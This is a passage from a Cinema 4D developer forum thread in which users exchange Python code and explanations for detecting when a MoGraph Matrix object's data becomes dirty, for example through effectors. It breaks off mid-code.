is clicked. Simple enough, but let's make sure we approach it with an object-orientation. Make a new text file and save it as DetailImage.as in classes/ui/detail/. Here's are code: package ui.detail { import flash.display.*; import flash.events.*; import flash.net.*; import flash.text.*; public class DetailImage { private var _container:Sprite; private var _attributionField:TextField; private var _link:String; private var _loader:Loader; public function DetailImage(container:Sprite) { _container = container; _attributionField = _container.getChildByName("attributionField") as TextField; _loader = new Loader(); _container.addChildAt(_loader, _container.getChildIndex(_attributionField)); _container.mouseChildren = false; _container.buttonMode = true; _container.addEventListener(MouseEvent.CLICK, onClick); } private function onClick(e:MouseEvent):void { navigateToURL(new URLRequest(_link), "_blank"); } public function setImage(src:String, attribution:String, link:String):void { _loader.load(new URLRequest(src)); _attributionField.text = attribution; _link = link; } } } Now, most of this depends on the fact that we'll be passing in a specific movie clip to the constructor. The code controlling this bit of the UI is operating on the assumption that it has a certain Sprite associated with it, in the property called _container. Namely, it expects there to be a TextField somewhere inside the Sprite called "attributionField". Here's a quick walkthrough of the class: after the imports and boilerplate, we have four properties. The _container is the aforementioned Sprite that is passed in. This will be a Sprite on the stage of the FLA, and we'll get to this again in the next step. The _attributionField is a reference to the TextField inside of the _container. It will just be a convenience to be able to refer to it through a variable rather than always through getChildByName. _loader is a Loader object we create to load the images, and _link is just the destination of the click. The constructor does most of the heavy lifting. It sets up most of the properties, and sets up the entire Sprite as a button. To round the class out, we have the onClick method that is the CLICK handler, and simply navigates to the URL currently stored in _link. And then there's setImage; this takes information we need to display the DetailImage as a unique image and does the appropriate things with the information: it loads the image source in the Loader, it sets the text to the attribution, and it stores the link for later use in the onClick method. Again, this isn't a very complex class. We can try to keep things simpler by creating lots of smaller, focused objects. There's nothing to test yet; save that for the next step when we set up the DetailImage. Step 38: Display a Detail Image In order to display a detail image, we'll want to first create a DetailImage object in our document class. So, in ImageViewer, add the highlighted code: package ui { import flash.display.*; import flash.events.*; import data.DataLoader; import data.ImageData; import events.ImageChangeEvent; import ui.detail.DetailImage; import ui.thumbs.ThumbnailCollection; public class ImageViewer extends Sprite { private var _imageData:DataLoader; private var _thumbnails:ThumbnailCollection; private var _detailImage:DetailImage; { var index:int = e.value; updateImage(index); } private function updateImage(index:uint):void { var img:ImageData = _imageData.getImageByIndex(index); _detailImage.setImage(img.source, img.attribution, img.link); } } } The big thing we do is call the setImage method on our DetailImage instance, and we should get some payoff. Go ahead and test the project, and see if clicking a Thumbnail results in something happening in DetailImage. Notice that the four lines added are all about the DetailImage. We expanded the functionality of our program by adding one object, and by making changes to one other class that uses that object. All of the other classes ( Thumbnail, ImageChangeEvent, etc) have not needed any updates to bring this significant change about. Notice also how our composition hierarchy has grown. Not only do we have our lineage of composition with the thumbnails, but now we have a whole separate branch involving the DetailImage. And with that in mind, we now add the final piece to this puzzle, the pagination system. Step 39: Pagination Buttons Our pagination UI will consist of the two buttons, the left and right arrow buttons in the FLA. Create yet another new text file, saved as PaginationButton in classes/ui/pagination/. Here is the code: package ui.pagination { import flash.display.*; import flash.events.*; public class PaginationButton extends EventDispatcher { private var _clip:Sprite; public function PaginationButton(clip:Sprite) { _clip = clip; _clip.addEventListener(MouseEvent.CLICK, onClick); _clip.mouseChildren = false; _clip.buttonMode = true; } private function onClick(e:MouseEvent):void { dispatchEvent(e); } public function enable():void { _clip.alpha = 1; _clip.mouseEnabled = true; } public function disable():void { _clip.alpha = 0.5; _clip.mouseEnabled = false; } } } The main point of this class, as a representation of a button, is to hold a Sprite (composition) and provide button-ish functionality to that Sprite. Most of this should be fairly obvious, but we also add the ability to enable and disable the button. This gives the object an easy method for, as you can guess, enabling or disabling the button. The functionality is encapsulated, and is the responsibility of the PaginationButton object. Notice that we are not only managing the interactivity (with _clip.mouseEnabled = true/false;) but also affecting the appearance, to make a disabled button look disabled (with _clip.alpha = 0.5;). Again, this is encapsulation; a simple call to disable disables the button, however the PaginationButton object actually accomplishes that task. This probably seems like a fairly complete class, but let's add an extra layer. Step 40: Adding Pagination We have a class for the individual buttons, but we'd like to group those together into a single entity. We'll create a Pagination class, which will compose the two PaginationButton objects. Create the last new text file of this project (yay!), call it Pagination.as, and save it in classes/ui/pagination/. Add this code: package ui.pagination { import flash.display.*; import flash.events.*; import events.ImageChangeEvent; public class Pagination extends EventDispatcher { private var _prevButton:PaginationButton; private var _nextButton:PaginationButton; public function Pagination(prevClip:Sprite, nextClip:Sprite) { _prevButton = new PaginationButton(prevClip); _nextButton = new PaginationButton(nextClip); _prevButton.addEventListener(MouseEvent.CLICK, onPrevClick); _nextButton.addEventListener(MouseEvent.CLICK, onNextClick); } private function onPrevClick(e:MouseEvent):void { dispatchEvent(new ImageChangeEvent(ImageChangeEvent.INDEX_OFFSET, -1)); } private function onNextClick(e:MouseEvent):void { dispatchEvent(new ImageChangeEvent(ImageChangeEvent.INDEX_OFFSET, 1)); } public function updateButtons(enablePrev:Boolean, enableNext:Boolean):void { if (enablePrev) { _prevButton.enable(); } else { _prevButton.disable(); } if (enableNext) { _nextButton.enable(); } else { _nextButton.disable(); } } } } This really isn't doing much, other than acting as a place to compose two PaginationButton objects. We might call this object a manager, pretty much existing to aggregate and control a collection of other objects. It does, however, let us treat that collection of objects as a single unit, while the PaginationButton class is a single unit already. However, a little wrench thrown into our system is how to handle what happens when a button is clicked. Here's what's going to happen: first, we listen for the CLICK events on our two buttons. Then we dispatch a new event in response. The event will an ImageChangeEvent, but the type will not be INDEX_CHANGE but instead a new type. We'll then use the value property to indicate in which direction we need to move from the current image index. We'll need to modify the ImageChangeEvent class, and that happens in the next step. You'll also notice the updateButtons method. This will give us a way to update the state of the collection of buttons. You can think of this as, again, encapsulation of a more complex task into a less complex command. Before we get to the ImageChangeEvent, you might be wondering why go to the trouble of creating this class at all. Or possibly why pass in the two Sprites and not create the two PaginationButtons and pass those in. Well, to be honest, the reason is that this is how I chose to do it. In my opinion (and please keep in mind that a lot of this is just my opinion, laid out in tutorial form), the idea of the pagination system deserves it's own object. When I see individual elements, like the individual pagination buttons, I see those as objects. And if those individual objects can be grouped, even if just conceptually, then that group is also represented by an object. It's not unlike the Thumbnail and ThumbnailCollection classes; the collection is represented by a group. It's not the only way to accomplish our goal, but it's a way that I've found tends to work well. If you want to try different tactics, by all means, do so. One of the best ways to learn Object-Oriented Programming is to try out ideas, and then see what did and didn't work. Of course, for this tutorial, you'll be best served by following along closely. Step 41: Update the ImageChangeEvent Let's make the updates to the the ImageChangeEvent class that we need. This really amounts to just adding the new INDEX_CHANGE type (highlighted below). package events { import flash.events.*; public class ImageChangeEvent extends Event { public static const INDEX_CHANGE:String = "indexChange"; public static const INDEX_OFFSET:String = "indexOffset";; } } } That's more or less it. If you haven't noticed, we'll use that value property as something more generic; it's expected that, if it's an INDEX_CHANGE event, then value will contain the destination index value. However, if it's an INDEX_OFFSET event, then value will represent the offset value (that is, how far off from the current index value we're supposed to travel). Here's our composition hierarchy as of now: One more step, and we can see the fruits of this labor. Step 42: Create the Pagination System We have the classes, we have the Movie Clips on the stage, we just need to turn the ignition. In ImageViewer, we need to create create a Pagination instance and listen for – and handle – its events. Add the following code: package ui { import flash.display.*; import flash.events.*; import data.DataLoader; import data.ImageData; import events.ImageChangeEvent; import ui.detail.DetailImage; import ui.pagination.Pagination; import ui.thumbs.ThumbnailCollection; public class ImageViewer extends Sprite { private var _imageData:DataLoader; private var _thumbnails:ThumbnailCollection; private var _detailImage:DetailImage; private var _pagination:Pagination;); _pagination = new Pagination(previous_mc, next_mc); _pagination.addEventListener(ImageChangeEvent.INDEX_OFFSET, onImageOffset); }; updateImage(_currentImageIndex); } private function onImageOffset(e:ImageChangeEvent):void { _currentImageIndex += e.value; if (_currentImageIndex < 0) { _currentImageIndex = 0; } else if (_currentImageIndex >= _imageData.length) { _currentImageIndex = _imageData.length - 1; } updateImage(_currentImageIndex); } private function updateImage(index:uint):void { var img:ImageData = _imageData.getImageByIndex(index); _detailImage.setImage(img.source, img.attribution, img.link); } } } By this point, the additions shouldn't be too shocking. First, in line 10, we import the Pagination class and then create a property for it at line 18. On lines 33 an3420 we create the instance and listen for the INDEX_OFFSET event. The most substantial change is the addition of the onImageOffset method, which is very similar to the onImageChange method, only it needs to pre-calculate the index from the offset value of the ImageChangeEvent and the current index. It also does some bounds checking, to make sure we haven't incremented past the end, or decremented past the beginning. Otherwise, it still calls updateImage with that new index. Now, the eagle-eyed among you will have noticed the usage of _imageData.length, which isn't currently a valid property on the DataLoader class. You're right; we need to add another data accessor method for DataLoader: public function get length():uint { return _xml.image.length(); } This just provides a nice and clean read-only property that queries the XML data for the number of nodes that exist. With this getter method in place, go ahead and run the movie. You'll be able to click on the arrow buttons now. Note that you can't swing past the beginning or end. This is by design; you could alter the logic to make it loop around to the other end, but for the purposes of this tutorial I want to have hard limits, for purposes of the next step. Step 43: Keep the UI in Sync Our last task to make sure the UI updates itself whenever there is any change to the display. For instance, a click on a Thumbnail currently displays the appropriate image. However, it should also draw a selection around the clicked Thumbnail, and also disable the next or previous button, if appropriate. Accordingly, a click on one of the PaginationButtons should not only display the image, but also disable or enable the PaginationButton as appropriate as well as draw the selection around the matching Thumbnail. You may notice that this is an instance where changes from one part of the UI affect a different part of the UI (aside from the more direct effect of changing the detail image). The temptation may be to have, say, the Thumbnail draw it's own selection when clicked, or the PaginationButtons to enable or disable themselves when clicked. However, if the Thumbnail drew its own selection, then how would me manage the selection when we changed the image from the PaginationButtons? It would be possible, but it would mean we'd be selecting the Thumbnails from two different locations. Instead, we'll let the hierarchy of composition work for us and keep this UI logic in one place: in ImageViewer. We're already managing the changing of the detail image from there, so why not also manage other UI updates there as well? Update the updateImage method like so: private function updateImage(index:uint):void { var img:ImageData = _imageData.getImageByIndex(index); _detailImage.setImage(img.srouce, img.attribution, img.link); _thumbnails.selectThumbnail(index); _pagination.updateButtons(index > 0, index < _imageData.length-1); } All we're doing is expanding the work involved when it's time to update the image, keeping the UI in sync. Now we need to write the selectThumbnail method on ThumbnailCollection. First, we'll need a property to store the currently selected Thumbnail object: private var _currentThumb:Thumbnail; And then we can write the selectThumbnail method that will use that property: public function selectThumbnail(index:int):void { if (_currentThumb) { _currentThumb.deselect(); } _currentThumb = _thumbnails[index] as Thumbnail; _currentThumb.select(); } The logic in this method just makes sure the previously stored Thumbnail (if there is one; there won't the first time we call this method) gets deselected, while the new one gets selected. This technique goes all the way back to the very first AS3 101 tutorial, on variables, if you want a deeper discussion. Back to the present. It might feel a little strange to have the Thumbnail CLICK dispatch up through the ThumbnailCollection object, then on to the ImageViewer object, which then calls a method on the ThumbnailCollection object, which then calls a method on the Thumbnail object. Why not just have each Thumbnail activate its own selection? Two reasons. First, we should ideally go back out to our manager class ( ThumbnailCollection) for the logic, because not only do we want to select the clicked Thumbnail, but we also want to de-select the previously selected Thumbnail. As it is, each Thumbnail is pretty autonomous, and that's the way we want it (encapsulation), and no individual Thumbnail object knows about any other Thumbnail object. So, we need the ThumbnailCollection to perform the deselection, at the least, and it makes sense to perform the selection from the same location. Second, as already mentioned, we want to be able to update the selection from other parts of the UI. And it's just a whole lot more manageable if we keep the logic to perform a selection in one place. Therefore, it makes sense for that one place to the "lowest common denominator" of the UI; the ImageViewer class. In our hierarchy, separate branches don't know much about each other. For instance, the pagination branch doesn't know about the thumbs branch, and so a change from the pagination that affects the thumbs would naturally be handle at the place where the branches join, i.e., the ImageViewer class. Enough theory; go ahead and try out the movie already! The UI should stay in sync; clicking on a thumbnail affects the state of the pagination, and vice versa. Nice going! Step 44: A Final Task One last thing, that's probably bugging you if you have an eye for the useful. We should really bring up an initial image in the DetailImage view. Should be easy enough...but where should implement the change? We could feed the DetailImage class an initial image to load. This would certainly display the image, but it wouldn't keep the UI updated. The PaginationButtons wouldn't know to disable the previous button (assuming the image is the first image), and we wouldn't get a selection on the Thumbnail. We could have the ThumbnailCollection automatically dispatch an ImageChangeEvent.INDEX_CHANGE event once it's populated with data, automatically filling in " 0" for the value. This would solve the problem of keeping the UI in sync. But is it really the ThumbnailCollection's job to worry about that? I said before that if it works, then it's technically not wrong, but is it the best solution? In my opinion, doing this puts the responsibility in the wrong place. It's not up to the ThumbnailCollection to have an initial selection. We'd really be doing it there for UI syncing purposes, which isn't what the ThumbnailCollection object is about. Why not just update the UI the same way we've established: have ImageView call updateImage. This way, it's the responsibility of the main document class to decide which image to display initially, and when, or if at all. It's also extremely simple to do so at this point. Just add one line to the onImageDataLoad method (highlighted below): private function onImageDataLoad(e:Event):void { var thumbPaths:Array = _imageData.getThumbnailPaths(); for (var i:uint = 0; i < thumbPaths.length; i++) { _thumbnails.addThumbAt(thumbPaths[i], i); } updateImage(0); } Run the movie now, and not only do we have a nicely set up initial state, but we've also explored, one more time, the idea of responsibilities and encapsulation. Step 45: For Further Experimentation We could take this concept of keeping the UI in sync a bit further, and if you would like the practice I would recommend you do so. However, this tutorial is already longer than average and I must leave you with this challenge: Make a "slideshow" button that also controls the image display. When clicked, it enters "play slideshow" mode, which starts up a Timer and consequently redispatches the TimerEvents as ImageChangeEvents, of the INDEX_OFFSET type. The slideshow should then pause when clicked again. In addition, it should automatically pause when you click on any of the thumbnails or the pagination (the assumption being that the user is interested in now resuming control of the images, and the auto-advance of the slideshow is no longer wanted). At its core, this problem is just another branch of the hierarchy of composition, and the same model of dispatching events back the ImageViewer object will do the trick. The implementation details are, of course, going to be different, but the general idea is the same. Hopefully this conceptual discussion also brought to light an advantage of Object-Oriented Programming: when objects are properly "sealed" and not dependent on each other (that is, encapsulated), adding features becomes almost trivial. You don't have to hunt through a pasta salad of code finding the right things to update. Just add some new objects, and get them instantiated in the right place (yes, that's an over-simplification. I'm trying to sell you on OOP, right?). Now, as I said, we don't have time to implement this slideshow feature here, and so I encourage you to try your hand at doing it yourself. I did, however, include a version of the project in the download package that has this finished already. If you need a hint, or are just too lazy to do it yourself but want to see it in action, take a look at the image_viewer_slideshow project. Summary In this tutorial we looked at building a simple project by utilizing Object-Oriented techniques. The project itself was (hopefully) something you could probably handle on your own without objects, but our goal was to demonstrate how a project can be constructed out of several objects and not just all lumped into one script. The hierarchy of composition is something that takes some getting used to, but with practice it becomes rather natural, and you'll be able to start a new project by looking at the desired result and breaking it down into that hierarchy. If you're new to Object-Oriented Programming, then all of this will probably be quite dizzying. Please don't be discouraged. It will take quite a bit of practice to get comfortable with OOP. The only way to get better, though, is to actually do it. You will probably write some pretty badly managed classes your first couple times out. That's OK; just learn what you can from the experience, and figure out what you would do differently if you had it to do again. I think it took me about a year from when I first learned OOP to get to a point where I actually felt like I didn't need to be ashamed of the code I had written. Just stick with it. Practice makes perfect, as they say. With that said, I'm glad you've hung in there so far! This tutorial series isn't even over yet, but this particular installment was rather leviathan in nature. Thanks for reading, and we'll get into some even more advanced Object-Oriented techniques in the next article. Envato Tuts+ tutorials are translated into other languages by our community members—you can be involved too!Translate this post
https://code.tutsplus.com/tutorials/as3-101-oop-additional-concepts--active-7412
CC-MAIN-2018-39
refinedweb
17,127
55.95
07 February 2012 11:11 [Source: ICIS news] LONDON (ICIS)--The ICIS petrochemical index (IPEX) for February has recovered to 320.12, compared with the revised* January figure of 300.95, representing a 6.4% strengthening of the index. All sub-indices of the IPEX improved, with the biggest price increases in all three regions being for aromatics, with an average of just over 10%. The largest price increases were for benzene, with Europe having the biggest movement of around 25% in dollar terms, despite a 2.4% strengthening of the dollar against the euro. The upward price movements were largely crude driven, as there were supply concerns connected with tensions in both Iran and Nigeria. There was pressure for downstream sector styrene to edge up with benzene, even though demand in key end-use sectors was relatively lacklustre. Even further downstream, polystyrene (PS) prices were up, following growing positivity in key markets. The Asian component of the IPEX saw the strongest growth again in January, firming by 8.0%, followed by the US at around 6% and Europe with around 3% growth in dollar terms. The Asian index was boosted the most by rebounding prices for butadiene (BD), which increased by 23.3% as a result of limited spot availability because of unplanned cracker outages in India and a heavy cracker turnaround scheduled in March and April. The weakest price increases and the most significant price drops were seen in the polymers sub-index, with an overall increase of only 1.2%. Polypropylene (PP) was the only chemical price to weaken in all three regions, following oversupply in the fourth quarter of 2011. Published at the beginning of each month, the IPEX provides an independent indicator of average change in world petrochemical prices. Dating back to January 1993, historical ?xml:namespace> The IPEX product basket comprises ethylene, propylene, benzene, toluene, paraxylene (PX), styrene, methanol, BD, polyvinyl chloride (PVC), polyethylene (PE), PP and PS. * The January IPEX has been revised from 300.82 to 300.95, following incorporation of the US December ethylene, styrene and PVC and Asian styrene contracts. This month’s index is also subject to revision once the US January styrene contract settles.
http://www.icis.com/Articles/2012/02/07/9529933/aromatics-sub-index-drives-february-ipex-uptick.html
CC-MAIN-2014-52
refinedweb
366
64.51
in SPI Pins for the Omega2: @Brice-Parent What did you install to make it work on the omega2? I followed the documentation but I get an error while registering the spi device : "Failed to find spi-gpio-custom. Maybe it is a built in module ?" spi-gpio-custom is software-based bit-banged SPI. The hardware-SPI on GPIOs 6-9 should already be enabled by default. Just do ls -l /dev/spi*and the SPI-bus should show up. @WereCatf It does show up, but when I use it with the python library as described here : I get that error. My code is pretty simple : import onionSpi spi = onionSpi.OnionSpi(32766, 1) spi.sck = 7 spi.mosi = 8 spi.miso = 9 spi.cs = 6 spi.registerDevice() spi.setupDevice() I got the 32766, 1 part from the /dev/spi32766.1 file name . - Brice Parent ). :
http://community.onion.io/topic/1560/spi-pins-for-the-omega2
CC-MAIN-2019-39
refinedweb
145
80.07
> b) Making (FindClause a) a mere type synonym of (FileInfo -> a) > has the benefit that the user can choose whether he wants to use > monads or applicative functors via the respective instances > or whether he does not. That's where I had started out, as a matter of fact. > or for general applicative functors as > > (||) <$> ((== ".hs") <$> extension) <*> ((== ".lhs") <$> extension) I don't find that very readable, I must confess. > Maybe unsafePerformIO is the best solution, because you may safely close > the file after having evaluated > > predicate (unsafePerformIO $ hGetContents handle) (fileinfo) > > to weak head normal form, i.e. True or False. I think it fits perfectly. In principle unsafeInterleaveIO $ readFile fileName ought to be better, because it will not try to open the file unless the predicate actually inspects it, and opening files is expensive. But it will also not close the file until a finalizer kicks in. A tidier approach might be: maybeH <- newIORef Nothing contents <- unsafeInterleaveIO $ do h <- openFile fileName ReadMode writeIORef maybeH (Just h) hGetContents h let result = predicate contents result `seq` readIORef maybeH >>= maybe (return ()) hClose That's a little cumbersome, but very appealing from the perspective of a user of the library. Unfortunately, it looks to me like it's not very safe; see below. > Using > System.FilePath.Find.fold gives you both file status and file path but > the ought-to-be equivalent approach of using foldl' on the list returned > by find only gives the file path but no file status. So, the suggestion > is to make find return a list of FileInfo Let me pass an idea by you. There's a problem with augmenting FileInfo to potentially cause IO to occur as above (both with your original suggestion and my changes), no? We lose the ability to control when a file might be opened, and when it ought to be closed. If that were the case, the fold interface would have the same problem, if it decided for some reason to sock away FileInfo values in an accumulator and work on them after the fold had completed. > Of course, this leads to the question whether find should be factored > even more into generate & prune > > find r p dir = map filepath . filter p . directoryWalk r dir > > with the intention that System.FilePath.Find only exports directoryWalk. That's a nice idea, but subject to the same problems as the fold interface would be if we added file contents to the interface. Your other observations regarding making a directory tree abstract, and instances of some of our favourite typeclasses, are very appealing. Now if only I could figure out a clean way to avoid bad things happening in the presence of that user-friendly IO code... <b
http://www.haskell.org/pipermail/libraries/2007-June/007688.html
CC-MAIN-2013-20
refinedweb
453
59.74
juju service names limited to 66 characters Bug Description I was seeing the following error when deploying a service: http:// Turns out, on testing, the issues is that socket_nix.go uses the service name for the socket name, which limits the length of service names to 66 chars (if no more than 9 units are deployed): $ cat test-net.go package main import "fmt" import "net" func main() { fmt. _, err := net.Listen("unix", "@/var/ if err != nil { } } $ go run test-net.go Hello, 世界 There was an error: listen unix @/var/lib/ Anything shorter is fine. Moving to correct project.
https://bugs.launchpad.net/pyjuju/+bug/1613489
CC-MAIN-2018-47
refinedweb
101
68.16
Don't mind the mess! We're currently in the process of migrating the Panda3D Manual to a new service. This is a temporary layout in the meantime. Panda3D has a set of utilities that may be used to learn more about various objects and methods within an application. To access these utilities you need to import the PythonUtil module as follows. from direct.showbase.PythonUtil import * The * can be replaced by any of the utility functions in that module. To get a detailed listing of a class or an object's attributes and methods, use the pdir() command. pdir() prints the information out to the command console. pdir() can take many arguments for formatting the output but the easiest way to use it is to provide it a NodePath. pdir() will list all of the functions of the class of NodePath including those of its base classes pdir(NodePath) # e.g. pdir(camera) There are many other useful functions in the PythonUtil module. All of these are not necessarily Panda specific, but utility functions for python. There are random number generators, random number generator in a gaussian distribution curve, quadratic equation solver, various list functions, useful angle functions etc. A full list can be found in the API. An alternative command to pdir is inspect(). This command will create a window with methods and attributes on one side, and the details of a selected attribute on the other. inspect() also displays the current values of a class’ attributes. If these attributes are changing, you may have to click on a value to refresh it. To use inspect() you have to do the following: from direct.tkpanels.inspector import inspect inspect(NodePath) # e.g. inspect(camera) While the directtools suite calls upon a number of tools, if the suite is disabled, the user may activate certain panels of the suite. The place() command opens the object placer console. The explore() opens the scene graph explorer, which allows you to inspect the hierarchy of a NodePath. Finally, in order to change the color of a NodePath, the rgbPanel() command opens color panel. camera.place() render.explore() panda.rgbPanel() Useful DirectTool panels are explained in the Panda Tools section.Previous Top Next
https://www.panda3d.org/manual/?title=Panda3D_Utility_Functions
CC-MAIN-2019-18
refinedweb
370
57.67
django-sphinx-db 0.1-3 Django database backend for SphinxQL. A SmartFile Open Source project. Read more about how SmartFile uses and contributes to Open Source software. Introduction This is a simple Django database backend that allows interaction with Sphinx via SphinxQL. It is basically the default Django MySQL backend with some changes for Sphinx. SphinxQL is a MySQL clone mode that Sphinx searchd supports. It allows you to query indexes via regular old SQL syntax. If you are using rt (real-time) indexes, you can also add and update documents in the index. This backend is meant to be configued as a database in the Django settings.py. This package provides a Manager class, SQLCompiler suite and supporting code to make this possible. Usage First of all, you must define a database connection in the Django configuration. You must also install the Sphinx database router and add django_sphinx_db to your INSTALLED_APPS list. # Install django_sphinx_db: INSTALLED_APPS += ('django_sphinx_db', ) # This is the name of the sphinx server in DATABASES: SPHINX_DATABASE_NAME = 'sphinx' # Define the connection to Sphinx DATABASES = { 'default': { # Your default database connection goes here... }, SPHINX_DATABASE_NAME: { 'ENGINE': 'django_sphinx_db.backend.sphinx', # The database name does not matter. 'NAME': '', # There is no user name or password. 'USER': '', 'PASSWORD': '', # Don't use localhost, this will result in using a UDS instead of TCP... 'HOST': '127.0.0.1', 'PORT': '9306', }, } # ... and route accordingly ... DATABASE_ROUTERS = ( 'django_sphinx_db.routers.SphinxRouter', ) ``` Then define a model that derives from the SphinxModel. As usual, the model will be placed in models.py. from django_sphinx_db.backend.models import SphinxModel, SphinxField class MyIndex(SphinxModel): class Meta: # This next bit is important, you don't want Django to manage # the table for this model. managed = False name = SphinxField() content = SphinxField() date = models.DateTimeField() size = models.IntegerField() Configuring Sphinx Now you need to generate a configuration file for your index. A management command is provided to convert the model definition to a suitable configuration. $ python manage.py syncsphinx >> /etc/sphinx.conf $ vi /etc/sphinx.conf The generated config file should be a good start however, you are urged to review the configuration against the [Sphinx configuration reference](). Using the Django ORM with Sphinx You can now query and manage your real-time index using the Django ORM. You can insert and update documents in the index using the following methods. The example below uses the [fulltext library]() for reading file contents as plain text. import os, time, fulltext # Add a document to the index. path = 'resume.doc' st = os.stat(path) MyIndex.objects.create( name = path, content = fulltext.get(path, ''), size = st.st_size, date = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(st.st_mtime)), ) # Update a document in the index doc = MyIndex.objects.get(pk=1) doc.content = fulltext.get(path, '') doc.size = st.st_size doc.date = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(st.st_mtime)) doc.save() You can perform full-text queries using the Django search operator. Read the Django documentation for more information. MyIndex.objects.filter(content__search='Foobar') The query is passed through directly to Sphinx, so the Sphinx extended query syntax is respected. Unit Testing The Sphinx backend for Django will ignore create_test_db and destroy_test_db calls. These calls will fail when the Sphinx database is configured, preventing you from running tests. However, this means that any configured Sphinx database will be used during testing. As long as you write your tests with this in mind, there should be no problem. Remember that you can use the TEST_NAME database connection parameter to redirect queries to a different database connection during test runs. - Downloads (All Versions): - 0 downloads in the last day - 0 downloads in the last week - 0 downloads in the last month - Author: Ben Timby - Download URL: - License: MIT - Categories - Package Index Owner: Ben.Timby - DOAP record: django-sphinx-db-0.1-3.xml
https://pypi.python.org/pypi/django-sphinx-db/0.1-3
CC-MAIN-2015-27
refinedweb
638
60.11
Your browser does not seem to support JavaScript. As a result, your viewing experience will be diminished, and you have been placed in read-only mode. Please download a browser that supports JavaScript, or enable it if it's disabled (i.e. NoScript). In continuation with my exploration of how to use the dirty state in python, I'm trying to check a Matrix object's dirty state with a python tag. If I check the MoData for dirty state, then it's ALWAYS dirty, no matter which flag I use. If I check the BaseObject's cache for dirty state, then it's ALWAYS not dirty. Am I doing something wrong here? My end goal is to get the Matrix' dirty state when its target spline is changing. Code and file attached: import c4d from c4d.modules import mograph as mo def main(): moData = mo.GeGetMoData(op.GetObject()) if moData.GetDirty(c4d.MDDIRTY_COUNT): print "object is dirty" else: print "not dirty" import c4d def main(): obj = op.GetObject() if obj.IsDirty(c4d.DIRTYFLAGS_CACHE): print "object is dirty" else: print "not dirty" matrix_dirty.c4d Hi c4d.C4DAtom.GetDirty() returns an integer, the dirty checksum. Since integers greater than zero all evaluate as True you get your always dirty behaviour. IsDirty() is a specific method of BaseObject and can be consumed (as I showed in my script). A more appropriate flag four your case would be c4d.DIRTYFLAGS_DATA. c4d.C4DAtom.GetDirty() True IsDirty() BaseObject c4d.DIRTYFLAGS_DATA Cheers zipit Thanks a lot. I didn't notice that GetDirty gives a dirty count instead of a boolean. I adapted your code (very helpful!) and I used a user-data instead of a plugin id, it seems to work for normal objects, but with the Matrix I still have trouble... Changing the Matrix parameters does change the GetDirty, but when using an Effector that changes the matrices, even though I can read these matrices from the MoData, the GetDirty doesn't increase the count, at least with the "MDDIRTY_ALL" flag. In the documentation it says for the "MDDIRTY_DATA": "Data in the arrays changed, must be manually set." But I'm not sure what it means by "manually set. I assume it refers to when manually setting the array data? What happens when using an effector or changing a target object? This is the current code: def main(): dirty_storage = op[c4d.ID_USERDATA,1] moData = mo.GeGetMoData(op.GetObject()) # Get the last cached dirty count and the current dirty count. lst_dcount = dirty_storage cur_dcount = moData.GetDirty(c4d.MDDIRTY_ALL) print "dirty count: " + str(cur_dcount) # count or there is no cached dirty count. if lst_dcount < cur_dcount: op[c4d.ID_USERDATA,1] = cur_dcount print "dirty" else: print "not dirty" And the file: matrix_dirty_0001.c4d Hi, lst_dcount < cur_dcount should be lst_dcount != cur_dcount, because when you have initialized that field with a value larger than the current dirty count (like in your document) , the whole thing will always evaluate as False. Same goes for the Python generator thing. lst_dcount < cur_dcount lst_dcount != cur_dcount False Hi, yes I noticed that this happens and your suggestion is more fool-proof. But the issue is that moData.GetDirty(c4d.MDDIRTY_ALL) doesn't increase when affecting the matrix using an Effector, or when adjusting its target object. I am not quite sure, why the MoData does not keep track of the changes, but I also do not know much about MoGraph. Has probably something to do with that effector-field construction of yours. MoData But you can always keep track of your data manually. Something like this: import c4d ID_DIRTY_CONTAINER = 1000000 ID_DIRTY_LAST_COUNT = 0 ID_DIRTY_MATRIX_CONTAINER = 1 def main(): """ Manually track the state of a MoData object. """ def is_dirty(dirty_count, clone_matrices): """Determines if the dirty count of the MoData object or the specific clone matrix array data is dirty. Also updates the dirty cache. Note: For every other array (weigth, color, size, etc.) you want to keep track off, you would have to do the same as for the matrices. Args: dirty_count (int): The dirty count of the MoGraph object. matrices (list[c4d.Matrix]): The matrix array of the clones. Returns: bool: If the data is dirty """ is_dirty = False bc_data = op[ID_DIRTY_CONTAINER] # Read and compare the cached dirty data with the current data if bc_data is not None: bc_matrices = bc_data[ID_DIRTY_MATRIX_CONTAINER] # Compare the clone matrices with our cached version if len(bc_matrices) == len(clone_matrices): for i, m in enumerate(clone_matrices): is_dirty |= m != bc_matrices[i] else: is_dirty = True # Compare the dirty count with our cached value is_dirty |= dirty_count != bc_data[ID_DIRTY_LAST_COUNT] # No cache of the dirty data has been generated yet else: bc_data = c4d.BaseContainer() is_dirty = True # Write the dirty data back bc_data[ID_DIRTY_LAST_COUNT] = dirty_count bc_matrices = c4d.BaseContainer() for i, m in enumerate(clone_matrices): bc_matrices[i] = m bc_data[ID_DIRTY_MATRIX_CONTAINER] = bc_matrices op[ID_DIRTY_CONTAINER] = bc_data return is_dirty md = c4d.modules.mograph.GeGetMoData(op.GetObject()) if is_dirty(dirty_count=md.GetDirty(c4d.MDDIRTY_ALL), clone_matrices=md.GetArray(c4d.MODATA_MATRIX)): print "Was dirty" else: print "Was not dirty" Thanks a lot, I'll try this out. Unfortunately iterating through the matrices one-by-one makes it much more costly to just check for the dirty state, so I'm not sure if is practical to use this solution. It would be more viable if the built-in Get Dirty worked, maybe that's a bug or a mistake from my side. I do not think that there is a mistake of ours. The docs are pretty clear on that the other operand (e.g. the effector) is responsible for maintaining the dirty checksum. This apparently does not happen in your setup. The why on that would be pure speculation on my side and would require further investigation. As already stated, I would suspect the field and effector combo as a possible cause. My example just shows you, how you could deal with the scenario of yours. I also do not think complexity is an issue here, since this is all linear and Python is not that slow, that it cannot even deal with linear. Or in other words: If runtime is getting an issue here, because the number of matrices is getting ridiculously large, you probably should neither use Python nor MoGraph at all. Hi @orestiskon I'm afraid there is nothing much more to say except what @zipit said. Just a few notes: Now take into consideration that the matrix object is kind of special since in reality, it creates nothing. But only feed some MoData and display them (but create no geometry). So how does an object that creates nothing can have its cache dirty? That's why it's up to the object that modifies the MoData (stored in its hidden tag ID_MOTAGDATA) to tell the matrix its content is dirty so other people that rely on this matrix know about it. Additionally to what @zipit said (which will work in any case and it's preferred) You can also consider checking for the dirtiness of the linked effector (but this will not consider Field). Here an example in a Python Generator import c4d def CheckDirtyObj(obj, uuid, flag): """ Checks if an object by comparing the current Dirt Value with the one stored in the current 